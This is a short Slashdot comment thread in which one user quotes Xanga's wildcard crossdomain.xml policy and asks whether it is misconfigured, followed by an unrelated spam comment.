Anonymous Coward | more than 4 years ago | (#30001070)

I'm not sure I totally understand the technical issues, but is Xanga doing this wrong? http://www.xanga.com/crossdomain.xml

cross-domain-policy>
    allow-http-request-headers-from domain="*" headers="*"/>
    allow-access-from domain="*" to-ports="80"/> /cross-domain-policy>

Premium White Pro (1)

ronnny (1672504) | more than 4 years ago | (#30003282)

Facebook is no comparison to myspace . Myspace is different zone of siti Premium White Pro [ezinearticles.com]
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?